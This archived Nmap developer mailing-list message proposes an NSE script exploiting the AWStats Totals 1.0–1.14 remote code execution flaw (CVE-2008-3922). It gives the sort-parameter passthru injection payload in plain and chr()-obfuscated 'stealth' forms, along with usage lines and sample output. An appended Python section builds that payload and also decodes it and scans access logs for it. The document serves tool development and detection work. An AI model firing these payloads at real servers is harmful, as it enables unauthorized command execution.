Nmap Development mailing list archives

Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14


From: Paulino Calderon <paulino () calderonpale com>
Date: Fri, 15 Jul 2011 18:32:12 -0700

On 07/11/2011 02:43 AM, Paulino Calderon wrote:
Hi nmap-dev,

description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]

  Stealth mode encodes the command string using PHP's chr() function. Ex.
  * Normal mode:
<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>
  * Stealth mode:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Totals:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file
---



_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

This update uses PHP's chr() encoding as default.

Toni: Thanks for the suggestion. I'll update the output before committing. I want to get some feedback beforehand regarding how the script should behave, since the only way to make sure an installation is vulnerable is by exploiting it and checking.

description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. [CVE: 2008-3922]

This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Totals:
* <code>/awstats/index.php</code>
* <code>/awstatstotals/index.php</code>
* <code>/awstats/awstatstotals.php</code>

References:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
* http://www.exploit-db.com/exploits/17324/
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
-- nmap --script http-awstatstotals-exec.nse -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.outfile Output file
---
-- Other useful args when running this script:
-- http.useragent - User Agent to use in GET request
--

--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon

Attachment: http-awstatstotals-exec.nse

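The encoding step the thread settles on (the command rebuilt with a chained PHP chr() expression inside the sort parameter), as an added example that is not part of the thread, of http-awstatstotals-exec.nse or of Nmap. The encoder reproduces the query string shown in the script description byte for byte; the decoder, the request inspector and the log scanner are additions aimed at the defender who finds these requests in an access log, and the Apache log lines are constructed for this example. The default URI /awstats/index.php is one of the common paths the thread lists; the parameter name CMD for the plain (non-chr) form is taken from the first message.

```python
"""Build and recognise the AWStats Totals sort-parameter payload from the thread.

Added example, not code from http-awstatstotals-exec.nse or from Nmap. The encoder
reproduces the query string shown in the script description; the decoder, the
request inspector and the log scanner are additions for reviewing access logs,
and the log lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit


def chr_encode(cmd):
    """'uname -a' -> 'chr(117).chr(110)...chr(97)': PHP rebuilds the string at
    runtime, so no quote characters travel in the request (hence the script's
    original 'stealth' name for this mode)."""
    return ".".join("chr(%d)" % ord(c) for c in cmd)


def build_sort_payload(cmd):
    """Value of the sort parameter as the script sends it: {${passthru(<cmd>)}}{${exit()}}.
    Only $, ( and ) of the outer calls are percent-encoded; the chr() chain stays
    literal, exactly as in the thread's example payload."""
    return "{%24{passthru%28" + chr_encode(cmd) + "%29}}{%24{exit%28%29}}"


def build_query(cmd, uri="/awstats/index.php"):
    """Full request target; the default URI is one of the common paths in the thread."""
    return uri + "?sort=" + build_sort_payload(cmd)


CHR_CALL = re.compile(r"chr\((\d{1,3})\)")
EVAL_MARK = re.compile(r"\{\$\{")           # PHP '{${ ... }}' complex syntax, after decoding
PARAM_REF = re.compile(r"\$_(?:GET|POST|REQUEST)\[['\"]?(\w+)['\"]?\]")


def chr_decode(expr):
    """Inverse of chr_encode: 'chr(108).chr(115)' -> 'ls'."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(expr))


def inspect_request(target):
    """Return (flagged, commands) for one request target (path + query string).

    Flags a sort value containing '{${' and recovers the command from either form
    seen in the thread: the chr()-encoded chain, or a reference such as $_GET[CMD]
    that points at another query parameter."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    commands = []
    for value in qs.get("sort", []):
        if not EVAL_MARK.search(value):
            continue
        if CHR_CALL.search(value):
            commands.append(chr_decode(value))
            continue
        ref = PARAM_REF.search(value)
        if ref:
            commands.extend(qs.get(ref.group(1), ["<missing %s>" % ref.group(1)]))
        else:
            commands.append(value)          # injected PHP we could not narrow further
    return bool(commands), commands


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed Apache combined-format lines for this example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jul/2011:18:32:12 -0700] "GET /awstats/index.php?config=site&month=all HTTP/1.1" 200 8421',
    '10.0.0.9 - - [15/Jul/2011:18:33:01 -0700] "GET ' + build_query("uname -a") + ' HTTP/1.1" 200 71',
    '10.0.0.9 - - [15/Jul/2011:18:33:40 -0700] "GET /awstats/index.php?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=id HTTP/1.1" 200 54',
]


def scan_log(lines):
    """Return [(client_ip, decoded command)] for every request carrying the injection."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        flagged, cmds = inspect_request(m.group(1))
        if flagged:
            client = line.split(" ", 1)[0]
            hits.extend((client, c) for c in cmds)
    return hits


if __name__ == "__main__":
    print(build_query("uname -a"))
    for client, cmd in scan_log(SAMPLE_LOG):
        print("%s ran: %s" % (client, cmd))
```

The inspector decodes before matching, which matters because the chr() form carries no quotes, no spaces and no recognisable command text on the wire; a signature that looks for `uname` or `passthru(` in the raw request misses it, while the `{${` marker survives any percent-encoding once the query string is decoded.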
